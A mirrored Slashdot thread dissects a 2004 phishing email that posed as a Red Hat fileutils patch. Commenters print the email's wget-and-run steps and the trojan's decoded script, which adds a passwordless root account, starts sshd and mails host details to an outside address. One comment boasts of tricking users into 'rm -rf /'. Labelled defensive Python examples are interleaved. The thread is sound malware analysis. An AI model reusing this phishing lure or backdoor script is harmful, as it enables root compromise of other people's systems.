Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

53 of 628 comments

  1. text of site by Anonymous Coward · · Score: 5, Informative

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    1. Re:text of site by Seehund · · Score: 5, Informative
      Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
      drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
      -rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
      -rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
      -rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
      But I see what you mean.

      Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      I doubt that many fell for this.

      --
      Help savingAmigaOS and a free PowerPC market
    2. Re:text of site by WindBourne · · Score: 5, Informative
      It is a little root kit.
      /bin/chgrp
      /bin/chmod
      /bin/chown
      /bin/cp
      /bin/dd
      /bin/df
      /bin/link
      /bin/ln
      /bin/ls
      /bin/mkdir
      /bin/mknod
      /bin/mv
      /bin/rm
      /bin/rmdir
      /bin/sync
      /bin/touch
      /bin/unlink
      /etc/DIR_COLORS
      /etc/DIR_COLORS.xterm
      /etc/profile.d
      /etc/profile.d/colorls.csh
      /etc/profile.d/colorls.sh
      /usr/bin/dir
      /usr/bin/dircolors
      /usr/bin/du
      /usr/bin/install
      /usr/bin/mkfifo
      /usr/bin/shred
      /usr/bin/vdir
      ...
      And there is more, but hey....
      --
      I prefer the "u" in honour as it seems to be missing these days.
    3. Re:text of site by innocent_white_lamb · · Score: 2, Informative
      Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/patch_file.tar.gz" or something like that.

      Actually, they did. I think what's posted here is "version 2". This version came around earlier this weekend:

      Original issue date: October 20, 2004

      Last revised: October 20, 2004

      Source: RedHat


      A complete revision history is at the end of this file.


      Dear RedHat user,


      Redhat found a vulnerability in fileutils (ls and mkdir), that could
      allow a remote attacker to execute arbitrary code with root privileges. Some
      of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
      8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
      *BSD and Solaris platforms are NOT affected.

      The RedHat Security Team
      strongly advises you to immediately apply the fileutils-1.0.6
      patch
      . This is a critical-critical update that you must make by
      following these steps:

      • First download the patch from the Stanford RedHat mirror:
        wget
        www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
      • Untar the patch: tar zxvf
        fileutils-1.0.6.patch.tar.gz
      • cd
        fileutils-1.0.6.patch
      • make
      • ./inst

      Again, please apply this patch as soon as possible or you risk your system
      and others` to be compromised.

      Thank you for your prompt attention to
      this serious matter,


      RedHat Security Team.


      Copyright © 2004 Red Hat, Inc. All rights reserved.

      --
      If you're a zombie and you know it, bite your friend!
  2. Here's what WHOIS says: by SIGBUS · · Score: 5, Informative

    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    --
    Oh, no! You have walked into the slavering fangs of a lurking grue!
    1. Re:Here's what WHOIS says: by barzok · · Score: 2, Informative

      95301 is Atwater, CA. There are at least 2 Cedar Avenues in NY (Staten Island and The Bronx), and one in Atwater.

    2. Re:Here's what WHOIS says: by datastalker · · Score: 3, Informative

      That phone number by area code and exchange is for Milton, CA, so chances are the entire WHOIS record is false.

    3. Re:Here's what WHOIS says: by Shandon · · Score: 2, Informative

      Data looks contradictory, but also be wary of the joe-job. Raymond Jackson may be an unpopular name to have right about now...

    4. Re:Here's what WHOIS says: by bconway · · Score: 2, Informative

      Don't forget the domain that the script emails, root@addlebrain.com:

      Found a referral to whois.enom.com.

      Registration Service Provided By: StoreIQ, Inc.
      Contact: technical@storeiq.com
      Visit:

      Domain name: addlebrain.com

      Registrant Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Administrative Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Technical Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Billing Contact:
      ABM Wireless
      Domain Administrator (administrator@buywirelessdirect.com)
      +1.7323331100
      Fax: +1.NA
      3587 US Highway 9 #132
      Freehold, NJ 07728
      US

      Status: Locked

      Name Servers:
      dns1.name-services.com
      dns2.name-services.com
      dns3.name-services.com
      dns4.name-services.com
      dns5.name-services.com

      Creation date: 18 Feb 2000 17:02:59
      Expiration date: 18 Feb 2005 17:02:59

      --
      Interested in open source engine management for your Subaru?
  3. Re:I'll try it... by damiam · · Score: 5, Informative

    Make sure you use a chroot jail; Knoppix can still write to your hard drive.

    --
    It's hard to be religious when certain people are never incinerated by bolts of lightning.
  4. Re:I'll try it... by busonerd · · Score: 4, Informative

    [apologies for replying to myself]

    The makefile compiles an application called inst that seems to have been created with the shc script compiler. It's rather obfuscated. Attempting to reverse engineer it now.

  5. Looking at the files.. by schmiddy · · Score: 1, Informative

    First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

    I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c , and a binary file "fileutils-patch.bin".

    Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

    I think there's at least stuff in there to crack your password file since I see:
    key(pswd, sizeof(pswd_t));
    in there. I'm guessing the binary patch file does some nasty stuff as well.

    P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

    fileutils-4.1.9-11
    =u9F!
    5928f30d339e2c8002986120e6abd2e7d4e61921
    =u9F!
    fileutils
    4.1.9
    The GNU versions of common file management utilities.
    The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
    Red Hat Linux
    Red Hat, Inc.
    Red Hat, Inc.
    Applications/File
    linux
    i386

    --
    http://cltracker.net -- powerful craigslist multi-city search
  6. Re:Stupid Tricks? by stratjakt · · Score: 1, Informative

    I wouldn't say the audience of linux is tech-savvy, they just think they are.

    The stupidest people I've ever met are the ones who think they know everything. Your average 14-year-old who installs Gentoo and now considers himself a giant in the world of computing fits the bill. I've suggested rm -rf / (logged in as root, of course) as a solution to email routing problems, and they do it.

    They'd easily fall for this. More easily, I'd say, than the average clueless user, since many of those are slightly technophobic. You just have to tickle their egos. Put some big technical-sounding words and acronyms in the email, and they'll suck it down.

    --
    I don't need no instructions to know how to rock!!!!
  7. Spelling/Grammar? by hereschenes · · Score: 2, Informative

    "Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

    Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

    --
    More like... nerdular nerdence!
  8. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    Identifying the system. This may take up to 2 minutes. Please wait...
    adduser: No more than two names.
    passwd: Unknown user bash
    Could not load host key: /etc/ssh/ssh_host_key
    Could not load host key: /etc/ssh/ssh_host_rsa_key
    Could not load host key: /etc/ssh/ssh_host_dsa_key
    Disabling protocol version 1. Could not load host key.
    Disabling protocol version 2. Could not load host key.
    sshd: no hostkeys available -- exiting.
    System looks OK. Proceeding to next step.

    Patching "ls": ###########
    Patching "mkdir": ##########

    System updated and secured successfully. You may erase these files.

  9. Re:I'll try it... by eakerin · · Score: 4, Informative
    Well I downloaded it, and uncompressed it.

    There are 3 files:
    fileutils-patch.bin
    inst.c
    Makefile

    fileutils-patch.bin is an rpm with an incorrect extension, but it's valid, and an actual RPM from redhat (I verified the GPG signature). Probably just put there to make it look bigger and have something that came from redhat.

    Well I was gonna put the package header information here, but slashcode didn't like it.

    Signature verification using "rpm --checksig fileutils-patch.bin"
    fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
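
An added example, not from the thread and not from the rpm tool itself: a small parser for the 96-byte rpmlead structure that every RPM file begins with. That lead is how `file` and `rpm` recognise the `.bin` as a package whatever its extension, and its name field is where the `fileutils-4.1.9-11` string at the top of schmiddy's `strings` output comes from. The sample bytes are constructed with the `build_lead` helper. The lead is a legacy structure: the authoritative name and version live in the header, and the signature that `rpm --checksig` verified above is not checked here, so this answers only "is the extension lying?", not "is this package genuine?".

```python
import struct

RPM_MAGIC = b"\xed\xab\xee\xdb"
# The rpmlead as laid out in rpm's rpmlead.h: magic[4], major, minor, type,
# archnum, name[66], osnum, signature_type, reserved[16]; shorts are big-endian.
LEAD_FORMAT = ">4sBBhh66shh16s"
LEAD_SIZE = struct.calcsize(LEAD_FORMAT)  # 96 bytes


def parse_rpm_lead(data):
    """Return the rpmlead fields as a dict, or None if data does not start with an RPM lead."""
    if len(data) < LEAD_SIZE:
        return None
    magic, major, minor, pkg_type, archnum, name, osnum, sigtype, _reserved = struct.unpack(
        LEAD_FORMAT, data[:LEAD_SIZE]
    )
    if magic != RPM_MAGIC:
        return None
    return {
        "version": f"{major}.{minor}",
        "type": "source" if pkg_type == 1 else "binary",
        "archnum": archnum,
        "name": name.split(b"\0", 1)[0].decode("ascii", "replace"),
        "osnum": osnum,
        "signature_type": sigtype,  # 5 = header-style signature block follows the lead
    }


def build_lead(name, major=3, minor=0, pkg_type=0, archnum=1, osnum=1, sigtype=5):
    """Construct a lead for test data; this produces no usable package, only its first 96 bytes."""
    return struct.pack(
        LEAD_FORMAT, RPM_MAGIC, major, minor, pkg_type, archnum,
        name.encode("ascii").ljust(66, b"\0"), osnum, sigtype, b"\0" * 16,
    )


def describe(filename, data):
    """One-line verdict on whether a file is an RPM, based on its bytes rather than its name."""
    lead = parse_rpm_lead(data)
    if lead is None:
        return f"{filename}: not an RPM (no rpmlead magic)"
    return f"{filename}: RPM lead v{lead['version']}, {lead['type']} package {lead['name']}"


# Constructed samples: a lead carrying the name seen in the strings output, and a gzip header.
SAMPLE_RPM = build_lead("fileutils-4.1.9-11") + b"\0" * 32
SAMPLE_GZIP = b"\x1f\x8b\x08\x00" + b"\0" * 100

if __name__ == "__main__":
    print(describe("fileutils-patch.bin", SAMPLE_RPM))
    print(describe("fileutils-1.0.6.patch.tar.gz", SAMPLE_GZIP))
```

Run it against a real file with `parse_rpm_lead(open(path, "rb").read(96))`; anything that reports a lead still needs `rpm --checksig` before you trust where it came from.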
  10. Use SPF to protect yourself from phishing by taubz · · Score: 5, Informative

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

    (Disclosure: I wrote the plugin. :) )

    1. Re:Use SPF to protect yourself from phishing by cortana · · Score: 3, Informative

      I don't see the original email, but I'd bet that it came from something@fedora-redhat.com, and so the SPF record for redhat.com would not have been useful in this case. :)

      On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).

      1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.

      2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?

      I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Received-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.

      SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a selection of message headers.

      Of course, if I'm wrong about any of this, please correct me. :)

    2. Re:Use SPF to protect yourself from phishing by cortana · · Score: 2, Informative

      > Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

      The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the SMTP envelope sender that SPF guards against.

      Consider:

      220 some mailserver... ready!
      MAIL FROM: sneaky@fedora-redhat.com
      250 OK
      RCPT TO: some_innocent@hotmail.com
      250 OK
      DATA
      354 you have a go
      From: security@redhat.com
      Subject: EMERGENCY SECURITY PATCH APPLY NOW!

      Etc etc. The SPF check is performed against sneaky@fedora-redhat.com--as per the SPF specification. The recipient of the message never sees sneaky@fedora-redhat.com, however, and is none the wiser.

      SPF certifies the envelope sender of a message, ensuring that an email has a non-forged return path.

      > Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

      Yes, and yes! Standards exist for a reason, ne? From the SPF FAQ:

      ---8---

      Does [SPF] protect the "From:" header field?

      SPF was designed to protect the envelope sender. That means the return-path that shows up in "MAIL FROM", and to a lesser extent the HELO argument that is supposed to be an FQDN. ...

      Protecting authorship information is an important goal. However, the technical issues associated with protecting the "From:" header are much more numerous and challenging. The best way to protect the header "From:" is by using a cryptographic signature such as S/MIME, PGP, or (when it is released) Yahoo DomainKeys.

      If you want to use the "From:" header as the subject of authentication with SPF, you need to be familiar with the following:

      * mailing lists
      * /etc/aliases-style forwarding
      * MUA "resend this message to"
      * web-generated email
      * the Sender header
      * the Resent-Sender and Resent-From headers

      ---8---

      Checking the From header at the MUA would prevent me, for example, sending email from anywhere except my ISP's servers. I would no longer be able to set up remailers to allow me to have mail from several addresses sent to my main address, and so on. Other stuff as in the list above will also break...
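
An added example, not from the thread and not from either poster's plugin, that makes cortana's distinction concrete. The SPF records and the client-side transcript are constructed (the addresses are documentation ranges, and the records are not the real ones for either domain), and the evaluator handles only the `ip4` and `all` mechanisms, which is enough to show the point: evaluated on the envelope sender, as the specification requires, the message passes, because whoever registered fedora-redhat.com also controls its record and its relay; evaluated on the header From, it fails; and the two domains do not match.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed stand-ins for DNS TXT lookups (assumption: these are NOT the real
# records of either domain; the ranges are RFC 5737 documentation addresses).
SPF_RECORDS = {
    "redhat.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "fedora-redhat.com": "v=spf1 ip4:198.51.100.0/24 -all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAIL_FROM_RE = re.compile(r"^MAIL FROM:\s*<?([^>\s]*)>?", re.IGNORECASE)


def check_spf(client_ip, domain, records=SPF_RECORDS):
    """Evaluate an SPF record that uses only ip4 and all mechanisms.

    Returns one of the SPF result names: pass, fail, softfail, neutral, none.
    """
    record = records.get(domain.lower())
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier, mech = "+", term
        if term[0] in QUALIFIERS:
            qualifier, mech = term[0], term[1:]
        if mech == "all":
            return QUALIFIERS[qualifier]
        if mech.startswith("ip4:") and ip in ipaddress.ip_network(mech[4:], strict=False):
            return QUALIFIERS[qualifier]
    return "neutral"  # nothing matched and the record has no "all" term


def parse_session(client_lines):
    """Pull the envelope sender (MAIL FROM) and the DATA payload out of the client side of an SMTP session."""
    envelope, body, in_data = "", [], False
    for line in client_lines:
        if in_data:
            if line == ".":
                break
            body.append(line[1:] if line.startswith("..") else line)  # undo dot-stuffing
        elif line.upper() == "DATA":
            in_data = True
        else:
            m = MAIL_FROM_RE.match(line)
            if m:
                envelope = m.group(1)
    return envelope, "\n".join(body)


def domain_of(addr):
    """Domain part of an address, or '' if there is none."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def evaluate(client_ip, client_lines, records=SPF_RECORDS):
    """SPF on the envelope sender (what the spec checks) and, for comparison, on the header From."""
    envelope, message = parse_session(client_lines)
    header_from = message_from_string(message).get("From", "")
    env_domain, hdr_domain = domain_of(envelope), domain_of(header_from)
    return {
        "envelope_domain": env_domain,
        "header_from_domain": hdr_domain,
        "spf_envelope": check_spf(client_ip, env_domain, records),
        "spf_header_from": check_spf(client_ip, hdr_domain, records),
        "aligned": env_domain == hdr_domain,
    }


# Constructed client side of the session sketched in the post above.
SAMPLE_SESSION = [
    "MAIL FROM:<sneaky@fedora-redhat.com>",
    "RCPT TO:<some_innocent@hotmail.com>",
    "DATA",
    "From: security@redhat.com",
    "Subject: EMERGENCY SECURITY PATCH APPLY NOW!",
    "",
    "Please apply the attached patch immediately.",
    ".",
]

if __name__ == "__main__":
    # 198.51.100.7 is the sender's own relay, which the sender's SPF record authorises.
    for key, value in evaluate("198.51.100.7", SAMPLE_SESSION).items():
        print(f"{key}: {value}")
```

The `aligned` flag is the comparison a From:-based client check is really making. It is not part of SPF, and it is exactly what breaks for the mailing-list, alias-forwarding and remailer cases in the FAQ excerpt above, where a legitimate envelope sender differs from the author's domain.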

  11. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

  12. Re:I'll try it... by superpeach · · Score: 5, Informative

    I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.html )

    The working bit of the script is:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

  13. Whois on domains are easily faked by Theatetus · · Score: 2, Informative

    However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com

    Anybody feel like dropping them a line to tell them they're hosting trojaners?

    --
    All's true that is mistrusted
  14. Re:I'll try it... by Cid+Highwind · · Score: 3, Informative

    From a quick glance at the source, it looks like "inst" is an RC4 decryption program with a hard-coded (but obfuscated) key. It will probably decrypt fileutils-patch.bin into the real exploit code.

    --
    0 1 - just my two bits
  15. Yahoo! by pavo · · Score: 2, Informative

    Shut it down! Someone paid you to host this, pass that information along to the authorities.

  16. Contents of inst.c... by enginuitor · · Score: 5, Informative

    I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
    View inst.c

  17. Re: I'll try it... Execution results! by Smitedogg · · Score: 5, Informative

    Here is what it does.

    Dogg

  18. Re:Real link? by crow · · Score: 3, Informative
    It looks like it's probably hosted by Yahoo!
    traceroute www.fedora-redhat.com
    traceroute: Warning: www.fedora-redhat.com has multiple addresses; using 66.218.79.149
    traceroute to premium4.geo.yahoo.akadns.net (66.218.79.149), 30 hops max, 38 byte packets
    I'm getting about 3MB/s right now. We won't slashdot the server, but we may well use up the bandwidth quota that this person bought.
  19. Re:Confidence by dtfinch · · Score: 2, Informative

    Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.

    For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.

  20. Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

    The source code for inst.c seems to be very similar to the "Klik client" code from http://klik.berlios.de/client/klik-0.1.3.c

    Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.

    Klik looks to be a "KDE-based Live Installer for Knoppix".

    Still looking....

    Red.

    1. Re:Looks to be a Klik client? by RedPhoenix · · Score: 2, Informative

      Ok, see superpeach's post above - both klik, and this, use a bit of code that includes shell script in a C program:
      http://www.datsi.fi.upm.es/~frosal/sourc es/shc.htm l

      Red.

  21. I'm retarded by Cid+Highwind · · Score: 4, Informative

    Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

    --
    0 1 - just my two bits
    1. Re:I'm retarded by busonerd · · Score: 5, Informative

      Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

  22. Re: I'll try it... Execution results! by MbM · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

    --
    - MbM
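
An added example, not from the thread: a check for the two artefacts the script quoted above (in superpeach's post and again here) leaves on a host, a second uid 0 account named bash and an empty password hash for it. The passwd and shadow contents are constructed to look like a system after `adduser -g 0 -u 0 -o bash` and `passwd -d bash` have run; the checks themselves are generic and will flag any extra uid 0 login or any account with an empty hash.

```python
# Constructed sample files, as /etc/passwd and /etc/shadow might look after the
# script above ran `adduser -g 0 -u 0 -o bash` followed by `passwd -d bash`.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$examplesalt$notarealhash:12712:0:99999:7:::
bin:*:12712:0:99999:7:::
alice:$1$examplesalt$notarealhash:12712:0:99999:7:::
bash::12712:0:99999:7:::
"""


def parse_colon_file(text):
    """Yield the field list of every non-empty, non-comment line of a passwd-style file."""
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            yield line.split(":")


def rogue_uid0_accounts(passwd_text):
    """Names other than root whose uid field is 0 (what `adduser -u 0 -o` creates)."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if len(f) >= 7 and f[2] == "0" and f[0] != "root"]


def passwordless_accounts(shadow_text):
    """Names whose shadow hash field is empty (what `passwd -d` leaves behind); '*' and '!' are locked, not empty."""
    return [f[0] for f in parse_colon_file(shadow_text)
            if len(f) >= 2 and f[1] == ""]


def audit(passwd_text, shadow_text):
    """Run both checks; a name on both lists is a root-equivalent login with no password at all."""
    uid0 = set(rogue_uid0_accounts(passwd_text))
    nopass = set(passwordless_accounts(shadow_text))
    return {
        "rogue_uid0": sorted(uid0),
        "passwordless": sorted(nopass),
        "passwordless_root": sorted(uid0 & nopass),
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # e.g. audit.py /etc/passwd /etc/shadow (reading shadow needs root)
        with open(sys.argv[1]) as p, open(sys.argv[2]) as s:
            findings = audit(p.read(), s.read())
    else:
        findings = audit(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for key, names in findings.items():
        print(f"{key}: {', '.join(names) or '-'}")
```

Finding the account is the easy part. The same script started sshd and mailed the host's interfaces and kernel version out, so a hit means the machine is compromised and its address is on someone's list, not merely that a user needs deleting. Whether the attacker could actually log in as bash over ssh with an empty password depends on sshd's PermitEmptyPasswords setting, which OpenSSH defaults to no; the uid 0 account is still there for any local or cracked login to use.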
  23. contact yahoo by Anonymous Coward · · Score: 4, Informative

    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

  24. Re:I'll try it... by aredubya74 · · Score: 4, Informative

    Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: addlebrain.com

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

    StoreIQ, Inc.
    John Thompson (technical@storeiq.com)
    +1.7323331145
    Fax:
    3587 US Highway 9 #213
    Freehold, NJ 07728
    US

    --

    RW

  25. Re:I'll try it... by at_slashdot · · Score: 2, Informative

    It's Romanian.

    --
    "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  26. Re:two good reasons by Antique+Geekmeister · · Score: 3, Informative

    But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overall customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.

  27. Better colours by Anonymous Coward · · Score: 1, Informative
  28. Re:How did you get his email and home address?? by Anonymous Coward · · Score: 1, Informative

    whois.tucows.com

    tho the info is fake.
    zip is Atwater, CA not NY.
    phone number is not NY either.
    209 899 SONORA California PACIFIC BELL RBOC

  29. Re:I'll try it... by at_slashdot · · Score: 3, Informative

    echo "Inca un root frate belea: "
    -translation: one more "root" brother trouble

    echo "user bash stii tu" >> /tmp/mama
    -translation: "user bash" you know

    cat /tmp/mama | mail -s "Inca o roata"
    -translation: one more wheel (roata -- root... it sounds alike)

    It doesn't say anything meaningful, the guy is an idiot.

    --
    "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  30. ADDLEBRAIN DNS WHOIS query.... by ScottKin · · Score: 0, Informative

